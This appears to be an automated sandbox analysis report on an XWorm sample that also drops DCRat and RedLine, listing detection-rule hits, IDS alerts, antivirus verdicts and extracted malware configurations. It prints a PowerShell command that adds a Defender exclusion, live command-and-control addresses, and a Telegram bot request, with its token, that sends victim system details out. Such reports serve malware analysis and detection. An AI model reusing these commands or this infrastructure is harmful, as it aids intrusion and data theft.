                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\rqbprm.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\rqbprm.exe, ParentProcessId: 1748, ParentProcessName: rqbprm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" , ProcessId: 2092, ProcessName: wscript.exe
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\agentwebreviewDhcp\portBrowserweb.exe, ProcessId: 7392, TargetFilename: C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7412, ProcessName: svchost.exe

                                    Data Obfuscation

                                    Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\agentwebreviewDhcp/portBrowserweb.exe", ParentImage: C:\agentwebreviewDhcp\portBrowserweb.exe, ParentProcessId: 7392, ParentProcessName: portBrowserweb.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", ProcessId: 6408, ProcessName: csc.exe
                                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                    2025-01-07T18:04:27.312774+010020480951A Network Trojan was detected192.168.2.749983104.21.48.180TCP
                                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                    2025-01-07T18:03:14.080824+010028536851A Network Trojan was detected192.168.2.749975149.154.167.220443TCP
                                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                    2025-01-07T18:03:53.951272+010028528741Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:23.952124+010028528741Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:18.141140+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.250525+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.365299+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.469268+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.582591+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.687952+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.797451+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.906757+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.016127+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.126093+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.234940+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.344671+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.453784+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.562958+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.698955+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.815770+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.926937+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.031731+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.141127+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.250411+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.359776+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.469224+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.592686+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.703557+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.812963+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.930463+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.031710+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.141044+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.260217+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.375936+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.487292+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.594783+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.704004+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.813164+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.938035+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.050278+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.156932+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.282853+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.391202+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.500528+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.611632+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.719160+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.828475+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.938113+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.047456+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.156855+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.266456+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.375485+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.492711+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.610512+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.722000+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.828875+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.941020+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.054932+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.166116+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.281666+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.414600+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.516442+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.625445+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.734901+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.845230+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.981872+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.103499+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.221709+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.352947+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.473002+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.579339+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.689728+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.808761+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.923159+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.071332+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.174677+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.296737+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.423123+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.533252+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.641115+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.750549+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.859856+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.969302+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.078587+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.205136+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.313088+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.422371+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.541471+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.672058+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.781851+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.908406+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.016254+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.125589+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.234936+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.347594+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.453816+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.566313+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.672376+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.781794+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.891660+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.028546+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.142287+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.250788+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.359990+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.469373+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.578758+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                    2025-01-07T18:03:28.966983+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                    2025-01-07T18:04:12.065408+0100 | 2853191 | 1 | Malware Command and Control Activity Detected | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                    2025-01-07T18:04:11.832339+0100 | 2853192 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                    2025-01-07T18:03:14.080824+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49975 | 149.154.167.220 | 443 | TCP


                                    AV Detection

                                    Source: HaLCYOFjMN.exe | Avira: detected
                                    Source: C:\Users\user\AppData\Local\Temp\jxseyegkwF.bat | Avira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files\Windows Mail\System.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXE | Avira: detection malicious, Label: TR/Spy.RedLine.hgyva
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe | Avira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\IJgIaehv.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: HaLCYOFjMN.exe | Malware Configuration Extractor: Xworm {"C2 url": ["94.141.122.161"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://122295cm.n9shteam.in/topollgamelongpoll", "MUTEX": "DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo"}
                                    Source: 25.0.cnvwov.EXE.6c0000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["94.141.122.161:7771"], "Bot Id": "button1"}
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | ReversingLabs: Detection: 65%
                                    Source: C:\Program Files\Windows Mail\System.exe | ReversingLabs: Detection: 65%
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXE | ReversingLabs: Detection: 67%
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe | ReversingLabs: Detection: 73%
                                    Source: C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe | ReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\IJgIaehv.log | ReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\MwyHCbxj.log | ReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\cXuwPjHF.log | ReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\gOlnWgHy.log | ReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\nuSUkZIl.log | ReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\poUkcZma.log | ReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\zXoALCrI.log | ReversingLabs: Detection: 20%
                                    Source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe | ReversingLabs: Detection: 65%
                                    Source: C:\agentwebreviewDhcp\WmiPrvSE.exe | ReversingLabs: Detection: 65%
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | ReversingLabs: Detection: 65%
                                    Source: HaLCYOFjMN.exe | ReversingLabs: Detection: 78%
                                    Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                                    Source: C:\Users\user\AppData\Roaming\Update.exe | Joe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
                                    Source: C:\Program Files\Windows Mail\System.exe | Joe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\IJgIaehv.log | Joe Sandbox ML: detected
                                    Source: HaLCYOFjMN.exe | Joe Sandbox ML: detected
                                    Source: HaLCYOFjMN.exe | String decryptor: 94.141.122.161
                                    Source: HaLCYOFjMN.exe | String decryptor: 7000
                                    Source: HaLCYOFjMN.exe | String decryptor: <123456789>
                                    Source: HaLCYOFjMN.exe | String decryptor: <Xwormmm>
                                    Source: HaLCYOFjMN.exe | String decryptor: nursultan
                                    Source: HaLCYOFjMN.exe | String decryptor: USB.exe
                                    Source: HaLCYOFjMN.exe | String decryptor: %AppData%
                                    Source: HaLCYOFjMN.exe | String decryptor: Update.exe
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://122295cm.n9shteam.in/","topollgamelongpoll"]]
                                    Source: HaLCYOFjMN.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | Directory created: C:\Program Files\Windows Mail\System.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | Directory created: C:\Program Files\Windows Mail\27d1bcfc3c54e0
                                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49975 version: TLS 1.2
                                    Source: HaLCYOFjMN.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rqbprm.exe, 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp, rqbprm.exe, 00000018.00000000.2086918365.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe | Code function: 24_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,24_2_00C6A69B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe | Code function: 24_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,24_2_00C7C220
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe | Code function: 24_2_00C8B348 FindFirstFileExA,24_2_00C8B348
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | File opened: C:\Users\user
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | File opened: C:\Users\user\AppData\Local
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | File opened: C:\Users\user\AppData
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe | File opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe | Code function: 4x nop then jmp 00007FFAAC483BF4h 5_2_00007FFAAC4833D1

                                    Networking

                                    Source: Network traffic | Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.7:49982 -> 94.141.122.161:7000
                                    Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49982 -> 94.141.122.161:7000
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49983 -> 104.21.48.1:80
                                    Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 94.141.122.161:7000 -> 192.168.2.7:49976
                                    Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 94.141.122.161:7000 -> 192.168.2.7:49976
                                    Source: Network traffic | Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: Network traffic | Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 94.141.122.161:7000 -> 192.168.2.7:49976
                                    Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49975 -> 149.154.167.220:443
                                    Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49975 -> 149.154.167.220:443
                                    Source: Malware configuration extractor | URLs: 94.141.122.161
                                    Source: Malware configuration extractor | URLs: 94.141.122.161:7771
                                    Source: unknown | DNS query: name: api.telegram.org
                                    Source: Yara match | File source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara match | File source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: global traffic | TCP traffic: 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: global traffic | HTTP traffic detected: GET /bot7568949165:AAGgQ5jLJjKDrnOV8dm-jnLIdWR-IOeUVTQ/sendMessage?chat_id=7733551555&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A23A5CC5CF533B5EED372%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ST_D6%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20nursultan HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                                    Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
                                    Source: Joe Sandbox View | ASN Name: UNITLINE_RST_NET1RostovnaDonuRU UNITLINE_RST_NET1RostovnaDonuRU
